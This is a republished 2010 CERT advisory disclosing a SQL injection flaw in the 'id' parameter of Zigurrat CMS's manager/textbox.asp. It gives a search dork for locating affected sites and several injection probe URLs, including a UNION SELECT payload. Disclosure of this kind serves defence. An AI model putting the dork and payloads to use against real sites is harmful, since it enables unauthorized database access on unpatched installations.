Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23388
HistoryMar 15, 2010 - 12:00 a.m.

Zigurrat CMS SQL Injection Vulnerability

2010-03-1500:00:00
vulners.com
54
JSON

================= IUT-CERT =================

Title: Zigurrat CMS SQL Injection Vulnerability

Vendor: www.farsi-cms.com

Dork: Design by Tagfa Co
Type: Input.Validation.Vulnerability (SQL Injection)

Fix: N/A

================== nsec.ir =================

Description:

Zigurrat CMS is a CMS producer in Iran. "manager/textbox.asp" pages in Pars CMS

product are vulnerable to SQL Injection vulnerability.

Vulnerability Variant:

Injection "manager/textbox.asp" in "id" parameter.

http://www.example.com/manager/textbox.asp?id='

http://www.example.com/manager/textbox.asp?id=0'

http://www.example.com/manager/textbox.asp?id=%2527

http://www.example.com/manager/textbox.asp?id=\'

http://www.example.com/manager/textbox.asp?id=<number> UNION SELECT *FROM VALIDTBLNAME'

Solution:

Input validation of Parameter "id" should be corrected.

Credit:

Isfahan University of Technology - Computer Emergency Response Team

Thanks to : M. Fereidounian, M. R. Faghani, N. Fathi,E. Jafari

JSON